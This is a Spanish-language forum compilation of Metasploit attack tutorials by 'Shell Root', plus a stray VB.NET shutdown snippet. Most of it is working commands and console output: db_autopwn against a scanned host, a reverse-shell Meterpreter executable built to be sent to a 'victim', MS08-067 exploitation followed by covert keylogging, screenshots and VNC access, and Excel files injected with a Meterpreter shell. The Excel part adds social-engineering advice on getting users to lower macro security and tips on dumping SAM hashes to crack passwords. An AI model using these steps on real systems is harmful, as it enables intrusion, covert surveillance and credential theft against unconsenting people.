Despues de haber escaneado la Dirección IP con el scanner Nessus exportamos el resultado dentro de un archivo con extensión .nbe, depues dentro del metasploit crearemos una base de datos con los datos que estan dentro del archivo de Nessus. Asi:

Código [Seleccionar] Expandir

msf > db_destroy
[*] Deleting /home/shell/.msf3/sqlite3.db...
msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /home/shell/.msf3/sqlite3.db
msf >

Miramos que comandos podemos usar

Código [Seleccionar] Expandir

msf > help

Database Backend Commands
=========================

   Command               Description
   -------               -----------
   db_add_host           Add one or more hosts to the database
   db_add_note           Add a note to host
   db_add_port           Add a port to host
   db_autopwn            Automatically exploit everything
   db_connect            Connect to an existing database
   db_create             Create a brand new database
   db_del_host           Delete one or more hosts from the database
   db_del_port           Delete one port from the database
   db_destroy            Drop an existing database
   db_disconnect         Disconnect from the current database instance
   db_driver             Specify a database driver
   db_hosts              List all hosts in the database
   db_import_amap_mlog   Import a THC-Amap scan results file (-o -m)
   db_import_nessus_nbe  Import a Nessus scan result file (NBE)
   db_import_nessus_xml  Import a Nessus scan result file (NESSUS)
   db_import_nmap_xml    Import a Nmap scan results file (-oX)
   db_nmap               Executes nmap and records the output automatically
   db_notes              List all notes in the database
   db_services           List all services in the database
   db_vulns              List all vulnerabilities in the database
   db_workspace          Switch between database workspaces


Importamos el archivo así:

Código [Seleccionar] Expandir

msf > db_import_nessus_nbe /home/shell/192.168.0.5.nbe

Para mirar los Host escaneados, ejecutamos este comando:

Código [Seleccionar] Expandir

msf > db_hosts

Hosts
=====

address      address6  arch  comm  created                         info  mac  name  os_flavor  os_lang  os_name  os_sp  state  Svcs  Vulns  Workspace
-------      --------  ----  ----  -------                         ----  ---  ----  ---------  -------  -------  -----  -----  ----  -----  ---------
192.168.0.5                        Fri Jan 01 19:22:13 -0500 2010                                                       alive  10    14     default

msf >

Para mirar los servicios que estan corriendo, ejecutamos este comando:

Código [Seleccionar] Expandir

msf > db_services

Services
========

created                         info  name           port   proto  state  Host         Workspace
-------                         ----  ----           ----   -----  -----  ----         ---------
Fri Jan 01 19:22:14 -0500 2010        smtp           25     tcp    up     192.168.0.5  default
Fri Jan 01 19:22:14 -0500 2010        http           80     tcp    up     192.168.0.5  default
Fri Jan 01 19:22:14 -0500 2010        epmap          135    tcp    up     192.168.0.5  default
Fri Jan 01 19:22:13 -0500 2010        netbios-ns     137    udp    up     192.168.0.5  default
Fri Jan 01 19:22:13 -0500 2010        netbios-ssn    139    tcp    up     192.168.0.5  default
Fri Jan 01 19:22:14 -0500 2010        https          443    tcp    up     192.168.0.5  default
Fri Jan 01 19:22:13 -0500 2010        microsoft-ds   445    tcp    up     192.168.0.5  default
Fri Jan 01 19:22:14 -0500 2010        blackjack      1025   tcp    up     192.168.0.5  default
Fri Jan 01 19:22:14 -0500 2010        ms-wbt-server  3389   tcp    up     192.168.0.5  default
Fri Jan 01 19:22:14 -0500 2010        Elite          31337  tcp    up     192.168.0.5  default

msf >

Para mirar las vulnerabilidades encontradas, ejecutamos este comando:

Código [Seleccionar] Expandir

msf > db_vulns
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=139 proto=tcp name=NSS-11011 refs=
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-11011 refs=
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=137 proto=udp name=NSS-10150 refs=
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10394 refs=CVE-1999-0504,BID-494,CVE-2000-0222,CVE-1999-0505,BID-11199,CVE-1999-0506,BID-990,CVE-2005-3595,CVE-2002-1117
[*] Time: Fri Jan 01 19:22:14 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10785 refs=
[*] Time: Fri Jan 01 19:22:14 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-35362 refs=OSVDB-52691,OSVDB-52692,CVE-2008-4114,BID-33121,BID-33122,OSVDB-48153,CVE-2008-4834,BID-31179,CVE-2008-4835
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-26917 refs=
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10397 refs=OSVDB-300
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-26920 refs=BID-494,CVE-2002-1117
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=80 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=25 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=3389 proto=tcp name=NSS-10940 refs=
[*] Time: Fri Jan 01 19:22:16 -0500 2010 Vuln: host=192.168.0.5 port=1025 proto=tcp name=NSS-22319 refs=
[*] Time: Fri Jan 01 19:22:16 -0500 2010 Vuln: host=192.168.0.5 port=25 proto=tcp name=NSS-10263 refs=
msf >


Ahora estamos listos para la ejecucion del comando db_autopwn. Miremos que parametros tiene disponible para la ejecución. Miramos que parametros necesitamos para correr el comando db_autopwn

Código [Seleccionar] Expandir

msf > db_autopwn
[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex

msf >

Solo son necesarios los parametros -e -x. Esperamos que termine la ejecucion de los exploit y miramos las sessiones del Meterpreter.

By: Shell Root

[Generando Ejecutable con PAYLOAD [Metasploit By: Shell Root]]

Generando Ejecutable con PAYLOAD
[Metasploit By: Shell Root]

Despues de explotar la vulnerabilidad en sistemas Windows XP SP 2 [445/tcp "Microsoft Windows XP microsoft-ds"] con el exploit exploit/windows/smb/ms08_067_netapi. Ahora veremos como obtener una session del Meterpreter cuando la victima ejecute un archivo Ejecutable.

Primero generamos el ejecutable con el PAYLOAD windows/meterpreter/reverse_tcp. Así, desde la Shell de Linux:

Código [Seleccionar] Expandir

shell@ShellRoot:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=5555 X > /home/shell/hola.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.0.5,LPORT=5555
shell@ShellRoot:~/msf3$

Nota: Me toco hacerlo desde Linux porque en W1nd0w$, no me funco el parametro X >.

Ahora revizamos la ruta /home/shell/hola.exe y miramos que existe el archivo.



Mandamos el archivo a la Victima, pero antes de ello, debemos configurar el Auxiliary multi/handler, de esta forma:

Código [Seleccionar] Expandir

shell@ShellRoot:~/msf3$ ./msfconsole

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf > use multi/handler


Cabe decir de que debemos de configurar de nuevo el PAYLOAD puesto dentro de archivo ejecutable que creamos al inicio (hola.exe), ponemos los mismos datos. Así:

Código [Seleccionar] Expandir

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555

Ahora es tiempo de ejecutar nuestro Auxiliary. Pero ejecutarémos digamos que en un "segundo plano", a la espera de que la victima abra el ejecutable que le mandamos. Así:

Código [Seleccionar] Expandir

msf exploit(handler) > exploit -j
[*] exploit Running as background job.

[*] Starting the payload handler...
[*] Started reverse handler on port 5555
msf exploit(handler) >

Ahora es cuestion de esperar a que la victima abra el archivo y obtendrémos la session del Meterpreter. Supongamos que pasaron varios minutos y que la victima abrio el archivo, nos debe de aparecer esto:

Código [Seleccionar] Expandir

msf exploit(handler) > [*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.5:5555 -> 192.168.0.2:11735)

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/generando-ejecutable-con-payload.html
Video: Nothing...

Saludos!

[[Metasploit By: Shell Root]]

Usar Keylogger del Metasploit
[Metasploit By: Shell Root]

Una de las muchas herramientas que trae integrada el Metasploit, es un Keylogger. Podemos capturar las teclas presionadas en el P.C Remoto, ademas de poder sacar un Screenshot. Aquí veremos el uso de esté servicio del Metasploit.

Primero ingresaremos a la P.C con el exploit:
    * exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:
    * windows/shell/bind_tcp
    * windows/shell/reverse_tcp

En este caso usaremos el PAYLOAD windows/shell/bind_tcp. No explicaré mucho porque para eso esta este POST de mi amigo Rcart.
http://foro.portalhacker.net/index.php/topic,93233.0.html

Código [Seleccionar] Expandir


                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
/     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 8 days ago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 8 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4367 -> 192.168.0.3:4444)

meterpreter >


Ahora que estamos dentro del P.C remoto, miremos las optiones que tiene, con el comando Help

Código [Seleccionar] Expandir

meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ps            List running processes
    migrate       Migrate the server to another process
    use           Load a one or more meterpreter extensions


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes

meterpreter >

Nota: Solo mostraré las opciones que nos interesa.

Es la hora de iniciar nuestro keylogger, pero antes, mirelos los procesos que estan corriendo en la P.C Remota, con el comando ps

Código [Seleccionar] Expandir

meterpreter > ps

Process list
============

    PID   Name          Path
    ---   ----          ----
    368   smss.exe      \SystemRoot\System32\smss.exe
    548   csrss.exe     \??\C:\WINDOWS\system32\csrss.exe
    576   winlogon.exe  \??\C:\WINDOWS\system32\winlogon.exe
    656   services.exe  C:\WINDOWS\system32\services.exe
    668   lsass.exe     C:\WINDOWS\system32\lsass.exe
    824   svchost.exe   C:\WINDOWS\system32\svchost.exe
    840   cmd.exe       C:\WINDOWS\system32\cmd.exe
    892   svchost.exe   C:\WINDOWS\system32\svchost.exe
    988   svchost.exe   C:\WINDOWS\System32\svchost.exe
    1040  svchost.exe   C:\WINDOWS\system32\svchost.exe
    1128  svchost.exe   C:\WINDOWS\system32\svchost.exe
    1384  wuauclt.exe   C:\WINDOWS\system32\wuauclt.exe
    1452  Explorer.EXE  C:\WINDOWS\Explorer.EXE
    1512  spoolsv.exe   C:\WINDOWS\system32\spoolsv.exe
    1684  alg.exe       C:\WINDOWS\System32\alg.exe
    1700  wscntfy.exe   C:\WINDOWS\system32\wscntfy.exe
    1800  ctfmon.exe    C:\WINDOWS\system32\ctfmon.exe
    1908  inetinfo.exe  C:\WINDOWS\system32\inetsrv\inetinfo.exe
    1936  metsvc.exe    C:\WINDOWS\TEMP\LsMhsBTb\metsvc.exe

meterpreter >


Ahora migremos al proceso Explorer.exe. Usaremos el comando Migrate [Numero_Proceso] . Miremos el PID del proceso Explorer.exe, es el numero 1452.

Código [Seleccionar] Expandir

meterpreter > migrate 1452
[*] Migrating to 1452...
[*] Migration completed successfully.
meterpreter >


Ya es hora de que iniciaremos el Keylogger con el comando keyscan_start

Código [Seleccionar] Expandir

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter >


Ahora con ayuda del comando keyscan_dump , veremos las teclas presionadas en la P.C Remota.

Código [Seleccionar] Expandir

meterpreter > keyscan_dump
Dumping captured keystrokes...
net user <Return>  <Ctrl>  <LCtrl>  <Alt>  <LMenu>
meterpreter >


Ahora miremos la opción de sacar un ScreenShot de la P.C Remota, para ello usaremos el plugin espia del metasploit.

Código [Seleccionar] Expandir

meterpreter > use espia
Loading extension espia...success.
meterpreter >

Despues con el comando screenshot [Ruta_Archivo_Salida] sacaremos una captura de pantalla de la P.C Remota.

Código [Seleccionar] Expandir

meterpreter > screenshot /Prueba.bmp
[*] Image saved to /Prueba.bmp
meterpreter >

Imagen:


Con esto damos por concluida el uso del Keylogger y lo pausamos con el comando keyscan_stop

Código [Seleccionar] Expandir

meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >


By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/usar-keylogger-del-metasploit.html
Video: http://www.youtube.com/watch?v=f8_M6V3xILE

[[Metasploit By: Shell Root]]

Vista del Escritorio Remoto con VNC
[Metasploit By: Shell Root]

Una de las muchas herramientas que trae integrada el Metasploit aparte de la que ya hemos visto (keyylogger & Screenshot). Tambien podemos conectarnos con VNC para ver el Escritorio Remoto. Aquí veremos el uso de esté servicio del Metasploit.

Primero ingresaremos a la P.C con el exploit:
   * exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:
   * windows/vncinject/bind_tcp

Código [Seleccionar] Expandir


                    888                           888        d8b888
                    888                           888        Y8P888
                    888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                          888
                                          888
                                          888


      =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
      =[ svn r7808 updated 9 days hago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 9 days hago.
        We recommend that you update the framework at least every other day.
        For information on updating your copy of Metasploit, please see:
            http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

  Id  Name
  --  ----
  0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.0.3      yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/vncinject/bind_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  AUTOVNC   true             yes       Automatically launch VNC viewer if present
  EXITFUNC  thread           yes       Exit technique: seh, thread, process
  LPORT     4444             yes       The local port
  RHOST     192.168.0.3      no        The target address
  VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
  VNCPORT   5900             yes       The local port to use for the VNC proxy


Exploit target:

  Id  Name
  --  ----
  0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (197120 bytes)
[*] VNC Server session 1 opened (192.168.0.2:2128 -> 192.168.0.3:4444)
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
[-] Exploit failed: Bad file descriptor
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > VNC Viewer Free Edition - VNC Viewer Free Edition for Win32, Version 4.1.3
Built on Oct 15 2008 at 17:04:00
Copyright © RealVNC Ltd. 2002-2008

[*] VNC Server session 1 closed.



Con ayuda del PAYLOAD windows/vncinject/bind_tcp podemos ejecutar el VNC y ver el escritorio remoto.

Imagen:


By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/vista-del-escritorio-remoto-con-vnc.html
Video: http://www.youtube.com/watch?v=k30889rxcOQ

[Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:]

XLSInjector – Inyectar Shell Meterpreter en Archivos Excel

Para nadie es un secreto que la suite ofimática mas utilizada en el mundo es Microsoft Office, que se lleva la mayor parte de la cuota de mercado en entornos Windows y Mac, de esta suite, las aplicaciones mas utilizadas son Microsoft Word, Microsoft Excel y Microsoft Power Point que casi siempre están instaladas en la mayoría de computadores.

En esta ocasión les voy a hablar sobre XLSInjector, una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

    * Una Maquina (virtual o real) con Windows
    * Microsoft Excel
    * Perl
    * El modulo Win32:OLE para Perl
    * Un archivo XML a infectar
    * El <a href="http://code.google.com/p/xlsinjector/">XLSInjector</a>
    * y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:

Código [Seleccionar] Expandir

perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls

Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que "confié" en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

    * iniciamos la consola del metasploit
    * una vez en la consola de MSF cargamos el payload de meterpreter
      set payload windows/meterpreter/bind_tcp
    * lo configuramos adecuadamente
      set RHOST ipdelpcvictima
      set RPOT 4444
    * luego lo lanzamos
      exploit

Con estos simples pasos tenemos a nuestra disposición una shell meterpreter en el equipo remoto.

Hay que resaltar la potencia de meterpreter para inyectar dll's, subir ficheros, ejecutar scripts, te recomiendo que le des una leída a estos documentos (Meterpreter.pdf y MSF3-met.html) para que aprendas mas sobre los comandos del meterpreter.

Te recomiendo utilizar el comando migrate tan pronto puedas para evitar que tan pronto cierren el archivo XLS se cierre con el tu shell, otro comando recomendado es hashdump que te arroja el contenido del archivo SAM en la maquina victima para que posteriormente puedas obtener la clave de los usuarios con herramientas como l0phtcrack o cain&abel.

Fuente: http://www.dark-bits.org/wp/2009/12/xlsinjector-%E2%80%93-inyectar-shell-meterpreter-en-archivos-excel/

Como dice el POST, queria compartir con Ud's un pequeño codigo.
Que lo que hacé es filtar comando del D.O.S en Visual Basic .NET.

Espero que les sirva.

Código [Seleccionar] Expandir

Imports System.Diagnostics

'---------------------------------------------|
'System.Diagnostics                           |
'---------------------------------------------|
'El espacio de nombres System.Diagnostics     |
'proporciona clases que permiten interactuar  |
'con los procesos del sistema, registros de   |
'eventos y contadores de rendimiento.         |
'---------------------------------------------|

Public Class Form1

    Private Sub shutdown_s_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles shutdown_s.Click
        '---------------------|
        'shutdown -s          |
        '---------------------|
        'Apagar el Equipo     |
        '---------------------|
        Process.Start("shutdown.exe", "-s")
    End Sub

    Private Sub shutdown_a_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles shutdown_a.Click
        '---------------------------------|
        'shutdown -a                      |
        '---------------------------------|
        'Anular el Apagado del Equipo     |
        '---------------------------------|
        Process.Start("shutdown.exe", "-a")
    End Sub

End Class

Saludos!!!